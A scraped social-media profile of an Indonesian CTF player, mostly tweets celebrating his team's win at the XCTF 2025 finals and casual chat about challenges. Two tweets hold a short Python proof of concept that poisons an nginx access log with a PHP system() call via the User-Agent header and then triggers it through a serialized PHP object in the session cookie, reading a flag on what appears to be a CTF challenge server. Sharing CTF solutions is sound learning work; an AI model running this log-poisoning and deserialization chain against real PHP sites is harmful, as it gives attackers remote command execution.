Dimas Maulana

87 posts

Dimas Maulana banner
Dimas Maulana

Dimas Maulana

@dimasma__

Active CTF Player and Member of TCP1P, SKSD, & Project Sekai | Bug Bounty Hunter at PatchStack | Cybersecurity Enthusiast | part time HackTheBox Challmaker

Bali Entrou em Kasım 2020
53 Seguindo163 Seguidores
Project Sekai CTF
Project Sekai CTF@ProjectSEKAIctf·
Over the weekend, our team competed in XCTF Finals in China as the only international team among 28. We placed 3rd place overall and 1st in the professional division. Huge thanks to @XCTF_League for the amazing event and high quality challenges. Hope to be back next year!
Project Sekai CTF tweet mediaProject Sekai CTF tweet mediaProject Sekai CTF tweet mediaProject Sekai CTF tweet media
English
2
10
113
9.7K
Dimas Maulana
Dimas Maulana@dimasma__·
@HIGHTECHS3C thank u mas nosa, memang rill sih dunia CTF sekarang kaya lebih speed up dari pada dulu, sekarang bahkan banyak yang lebih jago, idk kayanya saya aja yang kebanyakan AFK mean while mereka grinding nonstop atau mereka aja yang learningnya cepet banget, kayanya keduanya sih wkwk.
Indonesia
0
0
0
31
Dimas Maulana
Dimas Maulana@dimasma__·
Yes! We won! Project Sekai CTF took first place in the professional category at XCTF 2025 in China! all credit given to all project Sekai member that participate in this ctf👌
Dimas Maulana tweet mediaDimas Maulana tweet media
English
9
15
194
8.8K
van
van@ultramenn__·
@dimasma__ Keren mas🔥🔥🔥 Incaran pak purbaya nih
Indonesia
1
0
1
185
Dimas Maulana
Dimas Maulana@dimasma__·
@pawulooe hari hari di katain yang aneh2 gara2 challenge CTF😌 padahal beberapa bulan ini soalku banyak yang solve, dan enggak susah susah amat wkwk
Indonesia
1
0
0
57
Dimas Maulana
Dimas Maulana@dimasma__·
dir = "/var/log/nginx/access.log" s = "25" COOKIE = 'O:9:"PageModel":1:{s:4:"file";s:'+s+':"'+dir+'";}' COOKIE = base64.b64encode(COOKIE.encode()).decode() cmd = "cat /flag*" log_poisoning(cmd) print(COOKIE) r = requests.get(URL, cookies={"PHPSESSID": COOKIE}) print(r.text)
English
0
0
0
0
Dimas Maulana
Dimas Maulana@dimasma__·
POC: import requests, base64 URL = "http://157.245.33.77:30524/" def log_poisoning(cmd): HEADER = {'User-Agent': "<?php system('"+cmd+"'); ?>"} requests.get(URL, headers=HEADER) print("[+] Log poisoning successful")
English
1
0
0
0